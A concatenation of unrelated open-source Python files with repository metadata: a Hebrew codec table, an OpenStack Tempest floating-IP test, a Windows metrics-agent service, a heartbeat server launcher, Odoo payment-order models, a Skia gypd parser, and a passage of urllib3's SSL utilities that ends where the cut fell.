u'\ufffe' # 0xDD -> UNDEFINED
u'\ufffe' # 0xDE -> UNDEFINED
u'\ufffe' # 0xDF -> UNDEFINED
u'\u05d0' # 0xE0 -> HEBREW LETTER ALEF
u'\u05d1' # 0xE1 -> HEBREW LETTER BET
u'\u05d2' # 0xE2 -> HEBREW LETTER GIMEL
u'\u05d3' # 0xE3 -> HEBREW LETTER DALET
u'\u05d4' # 0xE4 -> HEBREW LETTER HE
u'\u05d5' # 0xE5 -> HEBREW LETTER VAV
u'\u05d6' # 0xE6 -> HEBREW LETTER ZAYIN
u'\u05d7' # 0xE7 -> HEBREW LETTER HET
u'\u05d8' # 0xE8 -> HEBREW LETTER TET
u'\u05d9' # 0xE9 -> HEBREW LETTER YOD
u'\u05da' # 0xEA -> HEBREW LETTER FINAL KAF
u'\u05db' # 0xEB -> HEBREW LETTER KAF
u'\u05dc' # 0xEC -> HEBREW LETTER LAMED
u'\u05dd' # 0xED -> HEBREW LETTER FINAL MEM
u'\u05de' # 0xEE -> HEBREW LETTER MEM
u'\u05df' # 0xEF -> HEBREW LETTER FINAL NUN
u'\u05e0' # 0xF0 -> HEBREW LETTER NUN
u'\u05e1' # 0xF1 -> HEBREW LETTER SAMEKH
u'\u05e2' # 0xF2 -> HEBREW LETTER AYIN
u'\u05e3' # 0xF3 -> HEBREW LETTER FINAL PE
u'\u05e4' # 0xF4 -> HEBREW LETTER PE
u'\u05e5' # 0xF5 -> HEBREW LETTER FINAL TSADI
u'\u05e6' # 0xF6 -> HEBREW LETTER TSADI
u'\u05e7' # 0xF7 -> HEBREW LETTER QOF
u'\u05e8' # 0xF8 -> HEBREW LETTER RESH
u'\u05e9' # 0xF9 -> HEBREW LETTER SHIN
u'\u05ea' # 0xFA -> HEBREW LETTER TAV
u'\ufffe' # 0xFB -> UNDEFINED
u'\ufffe' # 0xFC -> UNDEFINED
u'\u200e' # 0xFD -> LEFT-TO-RIGHT MARK
u'\u200f' # 0xFE -> RIGHT-TO-LEFT MARK
u'\ufffe' # 0xFF -> UNDEFINED
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
|
bsd-3-clause
|
nunogt/tempest
|
tempest/api/compute/floating_ips/test_floating_ips_actions.py
|
9
|
5803
|
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest_lib import exceptions as lib_exc
from tempest.api.compute.floating_ips import base
from tempest.common.utils import data_utils
from tempest.common import waiters
from tempest import test
class FloatingIPsTestJSON(base.BaseFloatingIPsTest):
server_id = None
floating_ip = None
@classmethod
def setup_clients(cls):
super(FloatingIPsTestJSON, cls).setup_clients()
cls.client = cls.floating_ips_client
@classmethod
def resource_setup(cls):
super(FloatingIPsTestJSON, cls).resource_setup()
cls.floating_ip_id = None
# Server creation
server = cls.create_test_server(wait_until='ACTIVE')
cls.server_id = server['id']
# Floating IP creation
body = cls.client.create_floating_ip()
cls.floating_ip_id = body['id']
cls.floating_ip = body['ip']
@classmethod
def resource_cleanup(cls):
# Deleting the floating IP which is created in this method
if cls.floating_ip_id:
cls.client.delete_floating_ip(cls.floating_ip_id)
super(FloatingIPsTestJSON, cls).resource_cleanup()
def _try_delete_floating_ip(self, floating_ip_id):
# delete floating ip, if it exists
try:
self.client.delete_floating_ip(floating_ip_id)
# if not found, it depicts it was deleted in the test
except lib_exc.NotFound:
pass
@test.idempotent_id('f7bfb946-297e-41b8-9e8c-aba8e9bb5194')
@test.services('network')
def test_allocate_floating_ip(self):
# Positive test:Allocation of a new floating IP to a project
# should be successful
body = self.client.create_floating_ip()
floating_ip_id_allocated = body['id']
self.addCleanup(self.client.delete_floating_ip,
floating_ip_id_allocated)
floating_ip_details = \
self.client.show_floating_ip(floating_ip_id_allocated)
# Checking if the details of allocated IP is in list of floating IP
body = self.client.list_floating_ips()
self.assertIn(floating_ip_details, body)
@test.idempotent_id('de45e989-b5ca-4a9b-916b-04a52e7bbb8b')
@test.services('network')
def test_delete_floating_ip(self):
# Positive test:Deletion of valid floating IP from project
# should be successful
# Creating the floating IP that is to be deleted in this method
floating_ip_body = self.client.create_floating_ip()
self.addCleanup(self._try_delete_floating_ip, floating_ip_body['id'])
# Deleting the floating IP from the project
self.client.delete_floating_ip(floating_ip_body['id'])
# Check it was really deleted.
self.client.wait_for_resource_deletion(floating_ip_body['id'])
@test.idempotent_id('307efa27-dc6f-48a0-8cd2-162ce3ef0b52')
@test.services('network')
def test_associate_disassociate_floating_ip(self):
# Positive test:Associate and disassociate the provided floating IP
# to a specific server should be successful
# Association of floating IP to fixed IP address
self.client.associate_floating_ip_to_server(
self.floating_ip,
self.server_id)
# Check instance_id in the floating_ip body
body = self.client.show_floating_ip(self.floating_ip_id)
self.assertEqual(self.server_id, body['instance_id'])
# Disassociation of floating IP that was associated in this method
self.client.disassociate_floating_ip_from_server(
self.floating_ip,
self.server_id)
@test.idempotent_id('6edef4b2-aaf1-4abc-bbe3-993e2561e0fe')
@test.services('network')
def test_associate_already_associated_floating_ip(self):
# positive test:Association of an already associated floating IP
# to specific server should change the association of the Floating IP
# Create server so as to use for Multiple association
new_name = data_utils.rand_name('floating_server')
body = self.create_test_server(name=new_name)
waiters.wait_for_server_status(self.servers_client,
body['id'], 'ACTIVE')
self.new_server_id = body['id']
self.addCleanup(self.servers_client.delete_server, self.new_server_id)
# Associating floating IP for the first time
self.client.associate_floating_ip_to_server(
self.floating_ip,
self.server_id)
# Associating floating IP for the second time
self.client.associate_floating_ip_to_server(
self.floating_ip,
self.new_server_id)
self.addCleanup(self.client.disassociate_floating_ip_from_server,
self.floating_ip,
self.new_server_id)
# Make sure no longer associated with old server
self.assertRaises((lib_exc.NotFound,
lib_exc.UnprocessableEntity,
lib_exc.Conflict),
self.client.disassociate_floating_ip_from_server,
self.floating_ip, self.server_id)
|
apache-2.0
|
loadimpact/loadimpact-server-metrics
|
li_metrics_agent_service.py
|
1
|
2556
|
#!/usr/bin/env python
# coding=utf-8
"""
Copyright 2012 Load Impact
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import li_metrics_agent
import threading
import win32service
import win32serviceutil
import win32event
import servicemanager
import sys
__author__ = "Load Impact"
__copyright__ = "Copyright 2012, Load Impact"
__license__ = "Apache License v2.0"
__version__ = "1.1.1"
__email__ = "support@loadimpact.com"
class AgentThread(threading.Thread):
def __init__(self):
super(AgentThread, self).__init__()
self.agent_loop = li_metrics_agent.AgentLoop()
def run(self):
self.agent_loop.run()
def stop(self):
self.agent_loop.stop()
class AgentService(win32serviceutil.ServiceFramework):
_svc_name_ = "LoadImpactServerMetricsAgent"
_svc_display_name_ = "Load Impact server metrics agent"
_svc_description_ = ("Agent for collecting and reporting server metrics "
"to loadimpact.com")
# init service framework
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
# listen for a stop request
self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
def SvcDoRun(self):
#import servicemanager
rc = None
self.ReportServiceStatus(win32service.SERVICE_RUNNING)
self.agent = AgentThread()
self.agent.start()
# loop until the stop event fires
while rc != win32event.WAIT_OBJECT_0:
# block for 5 seconds and listen for a stop event
rc = win32event.WaitForSingleObject(self.hWaitStop, 1000)
def SvcStop(self):
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
self.agent.stop()
self.agent.join()
win32event.SetEvent(self.hWaitStop)
if __name__ == '__main__':
if len(sys.argv) == 1:
servicemanager.Initialize()
servicemanager.PrepareToHostSingle(AgentService)
servicemanager.StartServiceCtrlDispatcher()
else:
win32serviceutil.HandleCommandLine(AgentService)
|
apache-2.0
|
alexliyu/CDMSYSTEM
|
firewall.py
|
1
|
1273
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
"""
主程序入口
@author:alex
@date:15-2-13
@time:上午11:44
@contact:alexliyu2012@gmail.com
"""
__author__ = 'alex'
import sys
import os
import ConfigParser
import uuid
from subprocess import Popen, PIPE
from utils.heartbeat import HeartBeatManager
from utils.tools import *
PROJECT_PATH = os.path.abspath(os.path.dirname(__file__))
def init(ini_file=None):
cf = ConfigParser.ConfigParser()
try:
if ini_file:
cf.read(ini_file)
else:
cf.read(os.path.join(PROJECT_PATH, "config.ini"))
redis_host = cf.get("REDIS", "IP")
redis_port = cf.getint("REDIS", "PORT")
listener_host = cf.get("LISTENING", "IP")
listener_port = cf.getint("LISTENING", "PORT")
except Exception, e:
print e
sys.exit(1)
print_info("REDIS端口 %s:%d" % (redis_host, redis_port))
print_info("监听心跳包端口 %s:%d" % (listener_host, listener_port))
print_info("开始运行白名单服务........")
server = HeartBeatManager(redis_host, redis_port, listener_host, listener_port)
server.run()
return True
if __name__ == "__main__":
if len(sys.argv) > 1:
init(sys.argv[1])
else:
init()
|
mit
|
Grirrane/odoo
|
addons/account_payment/account_payment.py
|
4
|
19120
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
import time
from openerp.osv import fields, osv
_logger = logging.getLogger(__name__)
class payment_mode(osv.osv):
_name= 'payment.mode'
_description= 'Payment Mode'
_columns = {
'name': fields.char('Name', required=True, help='Mode of Payment'),
'bank_id': fields.many2one('res.partner.bank', "Bank account",
required=True,help='Bank Account for the Payment Mode'),
'journal': fields.many2one('account.journal', 'Journal', required=True,
domain=[('type', 'in', ('bank','cash'))], help='Bank or Cash Journal for the Payment Mode'),
'company_id': fields.many2one('res.company', 'Company',required=True),
'partner_id':fields.related('company_id','partner_id',type='many2one',relation='res.partner',string='Partner',store=True,),
}
_defaults = {
'company_id': lambda self,cr,uid,c: self.pool.get('res.users').browse(cr, uid, uid, c).company_id.id
}
def suitable_bank_types(self, cr, uid, payment_code=None, context=None):
"""Return the codes of the bank type that are suitable
for the given payment type code"""
if not payment_code:
return []
cr.execute(""" SELECT pb.state
FROM res_partner_bank pb
JOIN payment_mode pm ON (pm.bank_id = pb.id)
WHERE pm.id = %s """, [payment_code])
return [x[0] for x in cr.fetchall()]
def onchange_company_id (self, cr, uid, ids, company_id=False, context=None):
result = {}
if company_id:
partner_id = self.pool.get('res.company').browse(cr, uid, company_id, context=context).partner_id.id
result['partner_id'] = partner_id
return {'value': result}
class payment_order(osv.osv):
_name = 'payment.order'
_description = 'Payment Order'
_rec_name = 'reference'
_order = 'id desc'
#dead code
def get_wizard(self, type):
_logger.warning("No wizard found for the payment type '%s'.", type)
return None
def _total(self, cursor, user, ids, name, args, context=None):
if not ids:
return {}
res = {}
for order in self.browse(cursor, user, ids, context=context):
if order.line_ids:
res[order.id] = reduce(lambda x, y: x + y.amount, order.line_ids, 0.0)
else:
res[order.id] = 0.0
return res
_columns = {
'date_scheduled': fields.date('Scheduled Date', states={'done':[('readonly', True)]}, help='Select a date if you have chosen Preferred Date to be fixed.'),
'reference': fields.char('Reference', required=1, states={'done': [('readonly', True)]}, copy=False),
'mode': fields.many2one('payment.mode', 'Payment Mode', select=True, required=1, states={'done': [('readonly', True)]}, help='Select the Payment Mode to be applied.'),
'state': fields.selection([
('draft', 'Draft'),
('cancel', 'Cancelled'),
('open', 'Confirmed'),
('done', 'Done')], 'Status', select=True, copy=False,
help='When an order is placed the status is \'Draft\'.\n Once the bank is confirmed the status is set to \'Confirmed\'.\n Then the order is paid the status is \'Done\'.'),
'line_ids': fields.one2many('payment.line', 'order_id', 'Payment lines', states={'done': [('readonly', True)]}),
'total': fields.function(_total, string="Total", type='float'),
'user_id': fields.many2one('res.users', 'Responsible', required=True, states={'done': [('readonly', True)]}),
'date_prefered': fields.selection([
('now', 'Directly'),
('due', 'Due date'),
('fixed', 'Fixed date')
], "Preferred Date", change_default=True, required=True, states={'done': [('readonly', True)]}, help="Choose an option for the Payment Order:'Fixed' stands for a date specified by you.'Directly' stands for the direct execution.'Due date' stands for the scheduled date of execution."),
'date_created': fields.date('Creation Date', readonly=True),
'date_done': fields.date('Execution Date', readonly=True),
'company_id': fields.related('mode', 'company_id', type='many2one', relation='res.company', string='Company', store=True, readonly=True),
}
_defaults = {
'user_id': lambda self,cr,uid,context: uid,
'state': 'draft',
'date_prefered': 'due',
'date_created': lambda *a: time.strftime('%Y-%m-%d'),
'reference': lambda self,cr,uid,context: self.pool.get('ir.sequence').next_by_code(cr, uid, 'payment.order'),
}
def set_to_draft(self, cr, uid, ids, *args):
self.write(cr, uid, ids, {'state': 'draft'})
self.create_workflow(cr, uid, ids)
return True
def action_open(self, cr, uid, ids, *args):
ir_seq_obj = self.pool.get('ir.sequence')
for order in self.read(cr, uid, ids, ['reference']):
if not order['reference']:
reference = ir_seq_obj.next_by_code(cr, uid, 'payment.order')
self.write(cr, uid, order['id'], {'reference':reference})
return True
def set_done(self, cr, uid, ids, *args):
self.write(cr, uid, ids, {'date_done': time.strftime('%Y-%m-%d')})
self.signal_workflow(cr, uid, ids, 'done')
return True
def write(self, cr, uid, ids, vals, context=None):
if context is None:
context = {}
payment_line_obj = self.pool.get('payment.line')
payment_line_ids = []
if (vals.get('date_prefered', False) == 'fixed' and not vals.get('date_scheduled', False)) or vals.get('date_scheduled', False):
for order in self.browse(cr, uid, ids, context=context):
for line in order.line_ids:
payment_line_ids.append(line.id)
payment_line_obj.write(cr, uid, payment_line_ids, {'date': vals.get('date_scheduled', False)}, context=context)
elif vals.get('date_prefered', False) == 'due':
vals.update({'date_scheduled': False})
for order in self.browse(cr, uid, ids, context=context):
for line in order.line_ids:
payment_line_obj.write(cr, uid, [line.id], {'date': line.ml_maturity_date}, context=context)
elif vals.get('date_prefered', False) == 'now':
vals.update({'date_scheduled': False})
for order in self.browse(cr, uid, ids, context=context):
for line in order.line_ids:
payment_line_ids.append(line.id)
payment_line_obj.write(cr, uid, payment_line_ids, {'date': False}, context=context)
return super(payment_order, self).write(cr, uid, ids, vals, context=context)
class payment_line(osv.osv):
_name = 'payment.line'
_description = 'Payment Line'
def translate(self, orig):
return {
"due_date": "date_maturity",
"reference": "ref"}.get(orig, orig)
def _info_owner(self, cr, uid, ids, name=None, args=None, context=None):
result = {}
for line in self.browse(cr, uid, ids, context=context):
owner = line.order_id.mode.bank_id.partner_id
result[line.id] = self._get_info_partner(cr, uid, owner, context=context)
return result
def _get_info_partner(self,cr, uid, partner_record, context=None):
if not partner_record:
return False
st = partner_record.street or ''
st1 = partner_record.street2 or ''
zip = partner_record.zip or ''
city = partner_record.city or ''
zip_city = zip + ' ' + city
cntry = partner_record.country_id and partner_record.country_id.name or ''
return partner_record.name + "\n" + st + " " + st1 + "\n" + zip_city + "\n" +cntry
def _info_partner(self, cr, uid, ids, name=None, args=None, context=None):
result = {}
for line in self.browse(cr, uid, ids, context=context):
result[line.id] = False
if not line.partner_id:
break
result[line.id] = self._get_info_partner(cr, uid, line.partner_id, context=context)
return result
#dead code
def select_by_name(self, cr, uid, ids, name, args, context=None):
if not ids: return {}
partner_obj = self.pool.get('res.partner')
cr.execute("""SELECT pl.id, ml.%s
FROM account_move_line ml
INNER JOIN payment_line pl
ON (ml.id = pl.move_line_id)
WHERE pl.id IN %%s"""% self.translate(name),
(tuple(ids),))
res = dict(cr.fetchall())
if name == 'partner_id':
partner_name = {}
for p_id, p_name in partner_obj.name_get(cr, uid,
filter(lambda x:x and x != 0,res.values()), context=context):
partner_name[p_id] = p_name
for id in ids:
if id in res and partner_name:
res[id] = (res[id],partner_name[res[id]])
else:
res[id] = (False,False)
else:
for id in ids:
res.setdefault(id, (False, ""))
return res
def _amount(self, cursor, user, ids, name, args, context=None):
if not ids:
return {}
currency_obj = self.pool.get('res.currency')
if context is None:
context = {}
res = {}
for line in self.browse(cursor, user, ids, context=context):
ctx = context.copy()
ctx['date'] = line.order_id.date_done or time.strftime('%Y-%m-%d')
res[line.id] = currency_obj.compute(cursor, user, line.currency.id,
line.company_currency.id,
line.amount_currency, context=ctx)
return res
def _get_currency(self, cr, uid, context=None):
user_obj = self.pool.get('res.users')
currency_obj = self.pool.get('res.currency')
user = user_obj.browse(cr, uid, uid, context=context)
if user.company_id:
return user.company_id.currency_id.id
else:
return currency_obj.search(cr, uid, [('rate', '=', 1.0)])[0]
def _get_date(self, cr, uid, context=None):
if context is None:
context = {}
payment_order_obj = self.pool.get('payment.order')
date = False
if context.get('order_id') and context['order_id']:
order = payment_order_obj.browse(cr, uid, context['order_id'], context=context)
if order.date_prefered == 'fixed':
date = order.date_scheduled
else:
date = time.strftime('%Y-%m-%d')
return date
def _get_ml_inv_ref(self, cr, uid, ids, *a):
res = {}
for id in self.browse(cr, uid, ids):
res[id.id] = False
if id.move_line_id:
if id.move_line_id.invoice:
res[id.id] = id.move_line_id.invoice.id
return res
def _get_ml_maturity_date(self, cr, uid, ids, *a):
res = {}
for id in self.browse(cr, uid, ids):
if id.move_line_id:
res[id.id] = id.move_line_id.date_maturity
else:
res[id.id] = False
return res
def _get_ml_created_date(self, cr, uid, ids, *a):
res = {}
for id in self.browse(cr, uid, ids):
if id.move_line_id:
res[id.id] = id.move_line_id.date_created
else:
res[id.id] = False
return res
_columns = {
'name': fields.char('Your Reference', required=True),
'communication': fields.char('Communication', required=True, help="Used as the message between ordering customer and current company. Depicts 'What do you want to say to the recipient about this order ?'"),
'communication2': fields.char('Communication 2', help='The successor message of Communication.'),
'move_line_id': fields.many2one('account.move.line', 'Entry line', domain=[('reconcile_id', '=', False), ('account_id.type', '=', 'payable')], help='This Entry Line will be referred for the information of the ordering customer.'),
'amount_currency': fields.float('Amount in Partner Currency', digits=(16, 2),
required=True, help='Payment amount in the partner currency'),
'currency': fields.many2one('res.currency','Partner Currency', required=True),
'company_currency': fields.many2one('res.currency', 'Company Currency', readonly=True),
'bank_id': fields.many2one('res.partner.bank', 'Destination Bank Account'),
'order_id': fields.many2one('payment.order', 'Order', required=True,
ondelete='cascade', select=True),
'partner_id': fields.many2one('res.partner', string="Partner", required=True, help='The Ordering Customer'),
'amount': fields.function(_amount, string='Amount in Company Currency',
type='float',
help='Payment amount in the company currency'),
'ml_date_created': fields.function(_get_ml_created_date, string="Effective Date",
type='date', help="Invoice Effective Date"),
'ml_maturity_date': fields.function(_get_ml_maturity_date, type='date', string='Due Date'),
'ml_inv_ref': fields.function(_get_ml_inv_ref, type='many2one', relation='account.invoice', string='Invoice Ref.'),
'info_owner': fields.function(_info_owner, string="Owner Account", type="text", help='Address of the Main Partner'),
'info_partner': fields.function(_info_partner, string="Destination Account", type="text", help='Address of the Ordering Customer.'),
'date': fields.date('Payment Date', help="If no payment date is specified, the bank will treat this payment line directly"),
'create_date': fields.datetime('Created', readonly=True),
'state': fields.selection([('normal','Free'), ('structured','Structured')], 'Communication Type', required=True),
'bank_statement_line_id': fields.many2one('account.bank.statement.line', 'Bank statement line'),
'company_id': fields.related('order_id', 'company_id', type='many2one', relation='res.company', string='Company', store=True, readonly=True),
}
_defaults = {
'name': lambda obj, cursor, user, context: obj.pool.get('ir.sequence'
).next_by_code(cursor, user, 'payment.line'),
'state': 'normal',
'currency': _get_currency,
'company_currency': _get_currency,
'date': _get_date,
}
_sql_constraints = [
('name_uniq', 'UNIQUE(name)', 'The payment line name must be unique!'),
]
def onchange_move_line(self, cr, uid, ids, move_line_id, payment_type, date_prefered, date_scheduled, currency=False, company_currency=False, context=None):
data = {}
move_line_obj = self.pool.get('account.move.line')
data['amount_currency'] = data['communication'] = data['partner_id'] = data['bank_id'] = data['amount'] = False
if move_line_id:
line = move_line_obj.browse(cr, uid, move_line_id, context=context)
data['amount_currency'] = line.amount_residual_currency
res = self.onchange_amount(cr, uid, ids, data['amount_currency'], currency,
company_currency, context)
if res:
data['amount'] = res['value']['amount']
data['partner_id'] = line.partner_id.id
temp = line.currency_id and line.currency_id.id or False
if not temp:
if line.invoice:
data['currency'] = line.invoice.currency_id.id
else:
data['currency'] = temp
# calling onchange of partner and updating data dictionary
temp_dict = self.onchange_partner(cr, uid, ids, line.partner_id.id, payment_type)
data.update(temp_dict['value'])
data['communication'] = line.ref
if date_prefered == 'now':
#no payment date => immediate payment
data['date'] = False
elif date_prefered == 'due':
data['date'] = line.date_maturity
elif date_prefered == 'fixed':
data['date'] = date_scheduled
return {'value': data}
def onchange_amount(self, cr, uid, ids, amount, currency, cmpny_currency, context=None):
if (not amount) or (not cmpny_currency):
return {'value': {'amount': False}}
res = {}
currency_obj = self.pool.get('res.currency')
company_amount = currency_obj.compute(cr, uid, currency, cmpny_currency, amount)
res['amount'] = company_amount
return {'value': res}
def onchange_partner(self, cr, uid, ids, partner_id, payment_type, context=None):
data = {}
partner_obj = self.pool.get('res.partner')
payment_mode_obj = self.pool.get('payment.mode')
data['info_partner'] = data['bank_id'] = False
if partner_id:
part_obj = partner_obj.browse(cr, uid, partner_id, context=context)
partner = part_obj.name or ''
data['info_partner'] = self._get_info_partner(cr, uid, part_obj, context=context)
if part_obj.bank_ids and payment_type:
bank_type = payment_mode_obj.suitable_bank_types(cr, uid, payment_type, context=context)
for bank in part_obj.bank_ids:
if bank.state in bank_type:
data['bank_id'] = bank.id
break
return {'value': data}
def fields_get(self, cr, uid, fields=None, context=None, write_access=True, attributes=None):
res = super(payment_line, self).fields_get(cr, uid, fields, context, write_access, attributes)
if 'communication2' in res:
res['communication2'].setdefault('states', {})
res['communication2']['states']['structured'] = [('readonly', True)]
res['communication2']['states']['normal'] = [('readonly', False)]
return res
|
agpl-3.0
|
RadonX-ROM/external_skia
|
platform_tools/android/gyp_gen/gypd_parser.py
|
144
|
5764
|
#!/usr/bin/python
# Copyright 2014 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Functions for parsing the gypd output from gyp.
"""
import os
def parse_dictionary(var_dict, d, current_target_name, dest_dir):
"""Helper function to get the meaningful entries in a dictionary.
Parse dictionary d, and store unique relevant entries in var_dict.
Recursively parses internal dictionaries and files that are referenced.
When parsing the 'libraries' list from gyp, entries in the form
'-l<name>' get assigned to var_dict.LOCAL_SHARED_LIBRARIES as 'lib<name>',
and entries in the form '[lib]<name>.a' get assigned to
var_dict.LOCAL_STATIC_LIBRARIES as 'lib<name>'.
Args:
var_dict: VarsDict object for storing the results of the parsing.
d: Dictionary object to parse.
current_target_name: The current target being parsed. If this dictionary
is a target, this will be its entry 'target_name'. Otherwise, this will
be the name of the target which contains this dictionary.
dest_dir: Destination for the eventual Android.mk that will be created from
this parse, relative to Skia trunk. Used to determine path for source
files.
"""
for source in d.get('sources', []):
# Compare against a lowercase version, in case files are named .H or .GYPI
lowercase_source = source.lower()
if lowercase_source.endswith('.h'):
# Android.mk does not need the header files.
continue
if lowercase_source.endswith('gypi'):
# The gypi files are included in sources, but the sources they included
# are also included. No need to parse them again.
continue
# The path is relative to the gyp folder, but Android wants the path
# relative to dest_dir.
rel_source = os.path.relpath(source, os.pardir)
rel_source = os.path.relpath(rel_source, dest_dir)
var_dict.LOCAL_SRC_FILES.add(rel_source)
for lib in d.get('libraries', []):
if lib.endswith('.a'):
# Remove the '.a'
lib = lib[:-2]
# Add 'lib', if necessary
if not lib.startswith('lib'):
lib = 'lib' + lib
var_dict.LOCAL_STATIC_LIBRARIES.add(lib)
else:
# lib will be in the form of '-l<name>'. Change it to 'lib<name>'
lib = lib.replace('-l', 'lib', 1)
var_dict.LOCAL_SHARED_LIBRARIES.add(lib)
for dependency in d.get('dependencies', []):
# Each dependency is listed as
# <path_to_file>:<target>#target
li = dependency.split(':')
assert(len(li) <= 2 and len(li) >= 1)
sub_targets = []
if len(li) == 2 and li[1] != '*':
sub_targets.append(li[1].split('#')[0])
sub_path = li[0]
assert(sub_path.endswith('.gyp'))
# Although the original reference is to a .gyp, parse the corresponding
# gypd file, which was constructed by gyp.
sub_path = sub_path + 'd'
parse_gypd(var_dict, sub_path, dest_dir, sub_targets)
if 'default_configuration' in d:
config_name = d['default_configuration']
# default_configuration is meaningless without configurations
assert('configurations' in d)
config = d['configurations'][config_name]
parse_dictionary(var_dict, config, current_target_name, dest_dir)
for flag in d.get('cflags', []):
var_dict.LOCAL_CFLAGS.add(flag)
for flag in d.get('cflags_cc', []):
var_dict.LOCAL_CPPFLAGS.add(flag)
for include in d.get('include_dirs', []):
if include.startswith('external'):
# This path is relative to the Android root. Leave it alone.
rel_include = include
else:
# As with source, the input path will be relative to gyp/, but Android
# wants relative to dest_dir.
rel_include = os.path.relpath(include, os.pardir)
rel_include = os.path.relpath(rel_include, dest_dir)
# No need to include the base directory.
if rel_include is os.curdir:
continue
rel_include = os.path.join('$(LOCAL_PATH)', rel_include)
# Remove a trailing slash, if present.
if rel_include.endswith('/'):
rel_include = rel_include[:-1]
var_dict.LOCAL_C_INCLUDES.add(rel_include)
# For the top level, libskia, include directories should be exported.
# FIXME (scroggo): Do not hard code this.
if current_target_name == 'libskia':
var_dict.LOCAL_EXPORT_C_INCLUDE_DIRS.add(rel_include)
for define in d.get('defines', []):
var_dict.DEFINES.add(define)
def parse_gypd(var_dict, path, dest_dir, desired_targets=None):
"""Parse a gypd file.
Open a file that consists of python dictionaries representing build targets.
Parse those dictionaries using parse_dictionary. Recursively parses
referenced files.
Args:
var_dict: VarsDict object for storing the result of the parse.
path: Path to gypd file.
dest_dir: Destination for the eventual Android.mk that will be created from
this parse, relative to Skia trunk. Used to determine path for source
files and include directories.
desired_targets: List of targets to be parsed from this file. If empty,
parse all targets.
"""
d = {}
with open(path, 'r') as f:
# Read the entire file as a dictionary
d = eval(f.read())
# The gypd file is structured such that the top level dictionary has an entry
# named 'targets'
for target in d['targets']:
target_name = target['target_name']
if target_name in var_dict.KNOWN_TARGETS:
# Avoid circular dependencies
continue
if desired_targets and target_name not in desired_targets:
# Our caller does not depend on this one
continue
# Add it to our known targets so we don't parse it again
var_dict.KNOWN_TARGETS.add(target_name)
parse_dictionary(var_dict, target, target_name, dest_dir)
|
bsd-3-clause
|
hrishioa/Navo
|
Raspi-Code/Lib/venv/lib/python2.7/site-packages/pip/_vendor/requests/packages/urllib3/util/ssl_.py
|
484
|
10037
|
from binascii import hexlify, unhexlify
from hashlib import md5, sha1, sha256
from ..exceptions import SSLError, InsecurePlatformWarning
SSLContext = None
HAS_SNI = False
create_default_context = None
import errno
import warnings
try: # Test for SSL features
import ssl
from ssl import wrap_socket, CERT_NONE, PROTOCOL_SSLv23
from ssl import HAS_SNI # Has SNI?
except ImportError:
pass
try:
from ssl import OP_NO_SSLv2, OP_NO_SSLv3, OP_NO_COMPRESSION
except ImportError:
OP_NO_SSLv2, OP_NO_SSLv3 = 0x1000000, 0x2000000
OP_NO_COMPRESSION = 0x20000
# A secure default.
# Sources for more information on TLS ciphers:
#
# - https://wiki.mozilla.org/Security/Server_Side_TLS
# - https://www.ssllabs.com/projects/best-practices/index.html
# - https://hynek.me/articles/hardening-your-web-servers-ssl-ciphers/
#
# The general intent is:
# - Prefer cipher suites that offer perfect forward secrecy (DHE/ECDHE),
# - prefer ECDHE over DHE for better performance,
# - prefer any AES-GCM over any AES-CBC for better performance and security,
# - use 3DES as fallback which is secure but slow,
# - disable NULL authentication, MD5 MACs and DSS for security reasons.
DEFAULT_CIPHERS = (
'ECDH+AESGCM:DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+HIGH:'
'DH+HIGH:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+HIGH:RSA+3DES:!aNULL:'
'!eNULL:!MD5'
)
try:
from ssl import SSLContext # Modern SSL?
except ImportError:
import sys
class SSLContext(object): # Platform-specific: Python 2 & 3.1
supports_set_ciphers = ((2, 7) <= sys.version_info < (3,) or
(3, 2) <= sys.version_info)
def __init__(self, protocol_version):
self.protocol = protocol_version
# Use default values from a real SSLContext
self.check_hostname = False
self.verify_mode = ssl.CERT_NONE
self.ca_certs = None
self.options = 0
self.certfile = None
self.keyfile = None
self.ciphers = None
def load_cert_chain(self, certfile, keyfile):
self.certfile = certfile
self.keyfile = keyfile
def load_verify_locations(self, location):
self.ca_certs = location
def set_ciphers(self, cipher_suite):
if not self.supports_set_ciphers:
raise TypeError(
'Your version of Python does not support setting '
'a custom cipher suite. Please upgrade to Python '
'2.7, 3.2, or later if you need this functionality.'
)
self.ciphers = cipher_suite
def wrap_socket(self, socket, server_hostname=None):
warnings.warn(
'A true SSLContext object is not available. This prevents '
'urllib3 from configuring SSL appropriately and may cause '
'certain SSL connections to fail. For more information, see '
'https://urllib3.readthedocs.org/en/latest/security.html'
'#insecureplatformwarning.',
InsecurePlatformWarning
)
kwargs = {
'keyfile': self.keyfile,
'certfile': self.certfile,
'ca_certs': self.ca_certs,
'cert_reqs': self.verify_mode,
'ssl_version': self.protocol,
}
